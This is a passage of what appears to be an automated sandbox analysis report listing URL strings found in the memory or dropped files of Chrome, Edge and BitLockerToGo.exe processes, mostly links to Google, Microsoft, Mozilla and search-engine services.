                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                          Source: msedge.exe, 0000000B.00000003.2238162830.0000028847573000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2311238394.0000028847575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: chrome.exe, 00000007.00000003.2136233104.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109205576.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115394474.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2164260236.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                          Source: chrome.exe, 00000007.00000003.2136233104.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109205576.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115394474.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2164260236.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                          Source: chrome.exe, 00000007.00000003.2136233104.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109205576.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115394474.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2164260236.00002FC000BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                          Source: chrome.exe, 00000007.00000003.2114645411.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116267973.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2126794662.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116897074.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109108414.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109131079.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2110583766.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109177552.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112515732.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.13.drString found in binary or memory: https://chromewebstore.google.com/
                          Source: msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstoreo
                          Source: chrome.exe, 00000007.00000003.2082554947.00005D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2082601562.00005D8C002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2319013598.00006FE800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                          Source: chrome.exe, 00000007.00000003.2115191569.00002FC000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: chrome.exe, 00000007.00000003.2157656759.00002FC001698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://docs.google.com/
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-autopush.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-preprod.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-staging.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive.google.com/
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
